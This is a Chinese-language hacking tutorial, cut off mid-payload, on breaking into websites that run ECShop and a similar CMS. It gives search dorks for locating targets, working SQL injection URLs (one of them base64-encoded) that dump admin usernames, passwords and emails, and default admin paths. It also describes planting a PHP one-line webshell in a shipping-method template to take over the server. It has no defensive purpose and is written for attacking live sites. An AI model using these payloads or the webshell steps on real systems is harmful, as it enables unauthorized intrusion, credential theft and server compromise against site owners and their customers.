Ecshop漏洞通殺0day【最新入侵手法】
搜索關鍵字:關鍵字:powered by ecshop
方法一:
普通代碼:
| 1 | user.php?act=order_query&order_sn=* union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/* |
變種代碼:
| 1 | search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 |
直接在網站後臺加入代碼回車就能爆出帳號密碼,再去掉代碼加上/admin回車就能直接進後臺了。
拿shell方法很簡單,找到“庫專案管理”再選擇“配送的方式”,在代碼最下面插入php一句話木馬: 不行就換php木馬的預代碼!
接著保存,一句話路徑是:http://www.xxx.org/myship.php ; 打開“ASP+PHP兩用Shell.html”填入位址,點擊一下環境變數,成功之後點擊上傳檔就可以拿shell了。
方法二
關鍵字:
| 1 | inurl:index.php?ac=article&at=read&did= |
默認後臺:adminsoft/index.php 或者 admin/
注入點(爆表首碼,比如:cm_admin......首碼就是cm,後面3個代碼要自行替換):
| 1 | index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 |
爆用戶名:
| 1 | index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 首碼_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 |
爆密碼:
| 1 | index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele |
